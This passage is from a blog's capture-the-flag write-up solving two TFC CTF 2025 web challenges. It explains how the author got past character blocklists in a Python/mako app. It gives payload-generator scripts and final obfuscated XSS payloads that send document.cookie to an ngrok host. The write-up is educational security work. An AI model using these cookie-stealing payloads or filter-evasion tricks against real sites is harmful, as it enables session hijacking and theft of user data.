</span></span><span style=display:flex><span>    templ <span style=color:#fe8019>=</span> html_template<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;NAME&#34;</span>, escape_html(name_to_display <span style=color:#fe8019>or</span> <span style=color:#b8bb26>&#34;&#34;</span>))
</span></span><span style=display:flex><span>    template <span style=color:#fe8019>=</span> Template(templ, lookup<span style=color:#fe8019>=</span>lookup)
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> template<span style=color:#fe8019>.</span>render(name_to_display<span style=color:#fe8019>=</span>name_to_display, banned<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;&amp;&lt;&gt;()&#34;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>class</span> SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> <span style=color:#fabd2f>do_GET</span>(self):
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#928374;font-style:italic># Parse the path and extract query parameters</span>
</span></span><span style=display:flex><span>        parsed_url <span style=color:#fe8019>=</span> urlparse(self<span style=color:#fe8019>.</span>path)
</span></span><span style=display:flex><span>        params <span style=color:#fe8019>=</span> parse_qs(parsed_url<span style=color:#fe8019>.</span>query)
</span></span><span style=display:flex><span>        name <span style=color:#fe8019>=</span> params<span style=color:#fe8019>.</span>get(<span style=color:#b8bb26>&#34;name_input&#34;</span>, [<span style=color:#b8bb26>&#34;&#34;</span>])[<span style=color:#d3869b>0</span>]
</span></span><span style=display:flex><span>        
</span></span><span style=display:flex><span>        <span style=color:#fe8019>for</span> b <span style=color:#fe8019>in</span> banned:
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> b <span style=color:#fe8019>in</span> name:
</span></span><span style=display:flex><span>                name <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;Banned characters detected!&#34;</span>
</span></span><span style=display:flex><span>                <span style=color:#fabd2f>print</span>(b)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>		[<span style=color:#fe8019>...</span>]
</span></span></code></pre></div><p>Even characters like <code>s</code> and <code>l</code> are blocked. The server uses <code>mako</code> template engine and since <code>${}</code> characters are not in the banned list we can try template injection:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903140548.webp></figure><p>Even though template injection works, we can&rsquo;t escalate it into RCE. But what we can do is to try generating an XSS payload using some python quirks.
We can construct characters using <code>%c</code> format string. <code>${'%c'%60}</code> will produce <code>&lt;</code>:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903140853.webp></figure><p>I made a script that will generate the payload for a given string:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#928374;font-style:italic>#!/usr/bin/env python3</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>banned <span style=color:#fe8019>=</span> [<span style=color:#b8bb26>&#34;s&#34;</span>,<span style=color:#b8bb26>&#34;l&#34;</span>,<span style=color:#b8bb26>&#34;(&#34;</span>,<span style=color:#b8bb26>&#34;)&#34;</span>,<span style=color:#b8bb26>&#34;_&#34;</span>,<span style=color:#b8bb26>&#34;.&#34;</span>,<span style=color:#b8bb26>&#39;&#34;&#39;</span>,<span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>\\</span><span style=color:#b8bb26>&#34;</span>,<span style=color:#b8bb26>&#34;;&#34;</span>,<span style=color:#b8bb26>&#34;,&#34;</span>,<span style=color:#b8bb26>&#34;|&#34;</span>,<span style=color:#b8bb26>&#34;&amp;&#34;</span>,<span style=color:#b8bb26>&#34;&lt;&#34;</span>,<span style=color:#b8bb26>&#34;&gt;&#34;</span>]
</span></span><span style=display:flex><span>payload <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;&lt;script&gt;fetch(&#39;http://WEBHOOK/?c=&#39;+document.cookie)&lt;/script&gt;&#34;</span>
</span></span><span style=display:flex><span>final_payload <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>for</span> i <span style=color:#fe8019>in</span> payload:
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> i <span style=color:#fe8019>in</span> banned:
</span></span><span style=display:flex><span>        val <span style=color:#fe8019>=</span> <span style=color:#fabd2f>str</span>(<span style=color:#fabd2f>ord</span>(i))
</span></span><span style=display:flex><span>        final_payload <span style=color:#fe8019>+=</span> <span style=color:#b8bb26>&#34;${&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;%&#34;</span> <span style=color:#fe8019>+</span> val <span style=color:#fe8019>+</span> <span style=color:#b8bb26>&#34;}&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>else</span>:
</span></span><span style=display:flex><span>        final_payload <span style=color:#fe8019>+=</span> i
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fabd2f>print</span>(final_payload)
</span></span></code></pre></div><p>I used <code>ngrok</code> and <code>nc</code> as the web hook. Final payload looks like this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>60</span>}${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>115</span>}cript${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>62</span>}fetch${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>40</span>}<span style=color:#b8bb26>&#39;http://0${&#39;</span><span style=color:#fe8019>%</span>c<span style=color:#b8bb26>&#39;%46}tcp${&#39;</span><span style=color:#fe8019>%</span>c<span style=color:#b8bb26>&#39;%46}in${&#39;</span><span style=color:#fe8019>%</span>c<span style=color:#b8bb26>&#39;%46}ngrok${&#39;</span><span style=color:#fe8019>%</span>c<span style=color:#b8bb26>&#39;%46}io:11938/?c=&#39;</span><span style=color:#fe8019>+</span>document${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>46</span>}cookie${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>41</span>}${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>60</span>}<span style=color:#fe8019>/</span>${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>115</span>}cript${<span style=color:#b8bb26>&#39;</span><span style=color:#b8bb26>%c</span><span style=color:#b8bb26>&#39;</span><span style=color:#fe8019>%</span><span style=color:#d3869b>62</span>}
</span></span></code></pre></div><p>We have to report this payload to the bot and it will leak the flag:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903141539.webp></figure><h2 id=kissfixess-revenge><a href=#kissfixess-revenge class=anchor-head aria-label=Anchor></a>Kissfixess Revenge</h2><blockquote><p>Okay, NOW ain&rsquo;t nobody gonna solve it.</p></blockquote><p>This follows the same format as before, but with some more added characters to the filter. The <code>banned</code> list now include <code>%</code> as well:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>banned <span style=color:#fe8019>=</span> [<span style=color:#b8bb26>&#34;s&#34;</span>, <span style=color:#b8bb26>&#34;l&#34;</span>, <span style=color:#b8bb26>&#34;(&#34;</span>, <span style=color:#b8bb26>&#34;)&#34;</span>, <span style=color:#b8bb26>&#34;self&#34;</span>, <span style=color:#b8bb26>&#34;_&#34;</span>, <span style=color:#b8bb26>&#34;.&#34;</span>, <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>&#34;</span>, <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>\\</span><span style=color:#b8bb26>&#34;</span>, <span style=color:#b8bb26>&#34;&amp;&#34;</span>, <span style=color:#b8bb26>&#34;%&#34;</span>, <span style=color:#b8bb26>&#34;^&#34;</span>, <span style=color:#b8bb26>&#34;#&#34;</span>, <span style=color:#b8bb26>&#34;@&#34;</span>, <span style=color:#b8bb26>&#34;!&#34;</span>, <span style=color:#b8bb26>&#34;*&#34;</span>, <span style=color:#b8bb26>&#34;-&#34;</span>, <span style=color:#b8bb26>&#34;import&#34;</span>, <span style=color:#b8bb26>&#34;eval&#34;</span>, <span style=color:#b8bb26>&#34;exec&#34;</span>, <span style=color:#b8bb26>&#34;os&#34;</span>, <span style=color:#b8bb26>&#34;;&#34;</span>, <span style=color:#b8bb26>&#34;,&#34;</span>, <span style=color:#b8bb26>&#34;|&#34;</span>, <span style=color:#b8bb26>&#34;JAVASCRIPT&#34;</span>, <span style=color:#b8bb26>&#34;window&#34;</span>, <span style=color:#b8bb26>&#34;atob&#34;</span>, <span style=color:#b8bb26>&#34;btoa&#34;</span>, <span style=color:#b8bb26>&#34;=&#34;</span>]
</span></span></code></pre></div><p>And it also checks the code contains <code>.</code> character after rendering the template with our input:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>render_page</span>(name_to_display<span style=color:#fe8019>=</span><span style=color:#fe8019>None</span>):
</span></span><span style=display:flex><span>    <span style=color:#b8bb26>&#34;&#34;&#34;Renders the HTML page with the given name.&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>    templ <span style=color:#fe8019>=</span> html_template<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;NAME&#34;</span>, name_to_display <span style=color:#fe8019>or</span> <span style=color:#b8bb26>&#34;&#34;</span>)
</span></span><span style=display:flex><span>    template <span style=color:#fe8019>=</span> Template(templ, lookup<span style=color:#fe8019>=</span>lookup)
</span></span><span style=display:flex><span>    tp <span style=color:#fe8019>=</span> template<span style=color:#fe8019>.</span>render(name_to_display<span style=color:#fe8019>=</span>name_to_display, banned<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;&amp;&lt;&gt;()&#34;</span>, copyright<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>, help<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>, quit<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>)
</span></span><span style=display:flex><span>    <span style=color:#fe8019>try</span>:
</span></span><span style=display:flex><span>        tp_data <span style=color:#fe8019>=</span> tp<span style=color:#fe8019>.</span>split(<span style=color:#b8bb26>&#34;&lt;div class=</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>rainbow-text</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>&gt;&#34;</span>)[<span style=color:#d3869b>1</span>]<span style=color:#fe8019>.</span>split(<span style=color:#b8bb26>&#34;&lt;/div&gt;&#34;</span>)[<span style=color:#d3869b>0</span>]
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> <span style=color:#b8bb26>&#34;.&#34;</span> <span style=color:#fe8019>in</span> tp_data <span style=color:#fe8019>or</span> <span style=color:#b8bb26>&#34;href&#34;</span> <span style=color:#fe8019>in</span> tp_data<span style=color:#fe8019>.</span>lower():
</span></span><span style=display:flex><span>            name <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;Banned characters detected!&#34;</span>
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> name
</span></span><span style=display:flex><span>    <span style=color:#fe8019>except</span> <span style=color:#fb4934>IndexError</span>:
</span></span><span style=display:flex><span>        name <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;Something went wrong!&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> name
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> tp
</span></span></code></pre></div><p>We need <code>.</code> in our payload for adding in our web hook. The code only checks the value inside: <code>&lt;div class="rainbow-text"></code> and <code>&lt;/div></code> based on the assumption that the rendered html code will follow this format:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html><span style=display:flex><span>&lt;<span style=color:#fb4934>div</span> <span style=color:#b8bb26;font-weight:700>class</span><span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;rainbow-text&#34;</span>&gt;NAME&lt;/<span style=color:#fb4934>div</span>&gt;
</span></span></code></pre></div><p>Where name will be replaced with the user input. But if we gave it an input like: <code>hi&lt;/div>&lt;Script>...&lt;/Script></code>, the <code>tp_data</code> variable will only take <code>hi</code> as the user input and checks for <code>.</code> inside this string.
So by prefixing our payload with an extra <code>&lt;/div></code> will help us bypass this check. But this is not enough, the <code>.</code> character is also inside the <code>banned</code> list. So we still have to generate it somehow.
This can be done using <code>String['fromCharCode'](46)</code> in javascript.
Now we can&rsquo;t use <code>%</code> character to generate rest of the blocked character like we did in the previous challenge. But we don&rsquo;t really have to generate every character like this. The banned list is only blocking <code>s</code>, we can still use <code>S</code> for the script tag since html is case insensitive. Characters like <code>&lt;>()</code> are directly passed to the <code>banned</code> variable when rendering the template:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>tp <span style=color:#fe8019>=</span> template<span style=color:#fe8019>.</span>render(name_to_display<span style=color:#fe8019>=</span>name_to_display, banned<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;&amp;&lt;&gt;()&#34;</span>, copyright<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>, help<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>, quit<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;haha&#34;</span>)
</span></span></code></pre></div><p>We can access the <code>banned</code> variable defined here inside mako template. <code>${banned[1]}</code> will produce <code>&lt;</code> and so on.
With this we can easily create a working payload:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>payload <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;hi&lt;/div&gt;&lt;script&gt;fetch(&#39;http://0.tcp.in.ngrok.io:17940/?&#39;+document[&#39;cookie&#39;])&lt;/script&gt;&#34;</span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Convert `.` character</span>
</span></span><span style=display:flex><span>payload <span style=color:#fe8019>=</span> payload<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;.&#34;</span>, <span style=color:#b8bb26>&#34;&#39;+ String[&#39;fromCharCode&#39;](46) +&#39;&#34;</span>)
</span></span><span style=display:flex><span>payload <span style=color:#fe8019>=</span> payload<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;s&#34;</span>, <span style=color:#b8bb26>&#34;S&#34;</span>)
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># &#39;(&#39; and &#39;)&#39; are available in banned variable</span>
</span></span><span style=display:flex><span>payload <span style=color:#fe8019>=</span> payload<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;(&#34;</span>, <span style=color:#b8bb26>&#34;$</span><span style=color:#b8bb26>{banned[3]}</span><span style=color:#b8bb26>&#34;</span>)
</span></span><span style=display:flex><span>payload <span style=color:#fe8019>=</span> payload<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;)&#34;</span>, <span style=color:#b8bb26>&#34;$</span><span style=color:#b8bb26>{banned[4]}</span><span style=color:#b8bb26>&#34;</span>)
</span></span><span style=display:flex><span><span style=color:#fabd2f>print</span>(payload)
</span></span></code></pre></div><p>The final payload will look like this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span>hi<span style=color:#fe8019>&lt;</span><span style=color:#b8bb26>/div&gt;&lt;Script&gt;fetch${banned[3]}&#39;http:/</span><span style=color:#fe8019>/</span><span style=color:#d3869b>0</span><span style=color:#b8bb26>&#39;+ String[&#39;</span>fromCharCode<span style=color:#b8bb26>&#39;]${banned[3]}46${banned[4]} +&#39;</span>tcp<span style=color:#b8bb26>&#39;+ String[&#39;</span>fromCharCode<span style=color:#b8bb26>&#39;]${banned[3]}46${banned[4]} +&#39;</span><span style=color:#fe8019>in</span><span style=color:#b8bb26>&#39;+ String[&#39;</span>fromCharCode<span style=color:#b8bb26>&#39;]${banned[3]}46${banned[4]} +&#39;</span>ngrok<span style=color:#b8bb26>&#39;+ String[&#39;</span>fromCharCode<span style=color:#b8bb26>&#39;]${banned[3]}46${banned[4]} +&#39;</span>io<span style=color:#fe8019>:</span><span style=color:#d3869b>17940</span><span style=color:#fe8019>/?</span><span style=color:#b8bb26>&#39;+document[&#39;</span>cookie&#39;]${banned[<span style=color:#d3869b>4</span>]}<span style=color:#fe8019>&lt;</span>/Script&gt;
</span></span></code></pre></div><p>We can report this to the bot and it will make a request to our web hook with the cookie:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903144441.webp></figure></div></article></main><aside id=sticky-top><div class=toc-title><p>TFC CTF 2025 Writeups</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><a href=#slippy>Slippy</a><ul><li><a href=#exploit>Exploit</a></li></ul></li><li><a href=#kissfixess>Kissfixess</a></li><li><a href=#kissfixess-revenge>Kissfixess Revenge</a></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2025-09-03</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/ctf/><p class=alert-heading>CTF Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/boi_android_malware/><div class=nav-arrow>Previous</div><span class=post-title>Android Malware Targeting Banking Credentials and SMS Data | Malware Research</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/shellshock/><div class=nav-arrow>Next</div><span class=post-title>CVE-2014-6271 - Shellshock</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>